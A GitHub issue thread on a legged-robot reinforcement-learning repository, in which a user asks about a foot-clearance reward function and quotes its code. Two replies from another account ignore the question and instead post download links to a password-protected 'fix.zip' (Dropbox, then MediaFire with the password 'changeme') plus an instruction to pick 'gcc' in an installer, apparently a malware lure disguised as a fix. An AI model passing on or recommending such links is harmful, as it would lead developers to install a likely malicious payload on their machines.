Improbable-AI/walk-these-ways #81: reward function issue: _reward_feet_clearance_cmd_linear()

sunzhon, 2024-08-26:
Hi @gmargo11,

Thank you for sharing this code. I’m currently working on reproducing the results from your paper. While reviewing the reward function as below, I noticed that the "phases" variable always seems to be zero because self.env.foot_indices remains constant. Consequently, the target_height is consistently set to 0.02. This makes me wonder if the reward function is specifically designed to enforce a swing height of 0.02. Could you confirm if this is correct?

def _reward_feet_clearance_cmd_linear(self):
        phases = 1 - torch.abs(1.0 - torch.clip((self.env.foot_indices * 2.0) - 1.0, 0.0, 1.0) * 2.0)
        foot_height = (self.env.foot_positions[:, :, 2]).view(self.env.num_envs, -1)# - reference_heights
        target_height = self.env.commands[:, 9].unsqueeze(1) * phases + 0.02 # offset for foot radius 2cm
        rew_foot_clearance = torch.square(target_height - foot_height) * (1 - self.env.desired_contact_states)
        return torch.sum(rew_foot_clearance, dim=1)

[code](https://github.com/Improbable-AI/walk-these-ways/blob/master/go1_gym/envs/rewards/corl_rewards.py)

Diganta-18, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

sunzhon, 2024-08-26:
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Sorry,  the link can not be accessed, as:
[image]

Diganta-18, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

closed 2024-08-27 by sunzhon